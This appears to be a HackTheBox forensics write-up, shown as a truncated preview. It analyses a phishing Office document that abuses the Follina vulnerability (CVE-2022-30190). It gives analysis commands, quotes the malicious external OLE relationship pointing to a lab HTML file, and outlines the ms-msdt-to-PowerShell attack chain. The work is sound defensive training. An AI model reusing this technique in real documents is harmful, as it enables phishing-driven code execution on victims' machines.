Diagnostic
hackthebox
Task: Analyze a malicious Office document from a phishing campaign to extract the hidden flag. Solution: Unzip the DOCX to find an external OLE object referencing an HTML file that exploits CVE-2022-30190 (Follina) via ms-msdt:/ protocol, decode the base64 PowerShell payload, and deobfuscate format string reordering to reveal the flag embedded in the malware filename.
$ ls tags/ techniques/
$ cat /etc/rate-limit
Rate limit reached (20 reads/hour per IP). Showing preview only — full content returns at the next hour roll-over.
Diagnostic - HackTheBox
Description
Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document. Take a look and figure out what's going on.
Analysis
This challenge involves analyzing a malicious Office document that exploits CVE-2022-30190 (Follina vulnerability). The attack chain:
- Phishing email with link to malicious
.docfile - Document contains external OLE object reference to HTML file
- HTML file uses
ms-msdt:/protocol handler to execute PowerShell - PowerShell payload is base64 encoded and uses format string obfuscation
- Flag is hidden in the filename of the downloaded malware
Solution
Step 1: Download the malicious document
Since DNS no longer resolves, use Host header to access the server directly:
curl -H "Host: diagnostic.htb" http://94.237.59.242:45434/layoffs.doc -o layoffs.doc
Step 2: Identify file type
file layoffs.doc # Output: Zip archive data, at least v2.0 to extract
The .doc extension is misleading - this is actually a DOCX file (Office Open XML format, which is a ZIP archive).
Step 3: Extract and analyze document structure
unzip layoffs.doc -d extracted/
Directory structure:
extracted/
├── [Content_Types].xml
├── _rels/
├── docProps/
└── word/
├── document.xml
├── _rels/
│ └── document.xml.rels
└── ...
Step 4: Find external OLE object reference
In word/document.xml, found an OLEObject with suspicious attributes:
Type="Link"- External referenceProgID="htmlfile"- Will be handled by HTML handler- References
rId996
In word/_rels/document.xml.rels:
<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://diagnostic.htb/223_index_style_fancy.html!" TargetMode="External"/>
Key indicator: External OLE object pointing to HTML file - classic Follina setup.
...
$ grep --similar
Similar writeups
- [forensics][free]oBfsC4t10n2— hackthebox
- [forensics][free]emo— hackthebox
- [forensics][Pro]oBfsC4t10n— HackTheBox
- [forensics][free]Obscure— hackthebox
- [forensics][free]Dream Job-2 Sherlock Scenario— hackthebox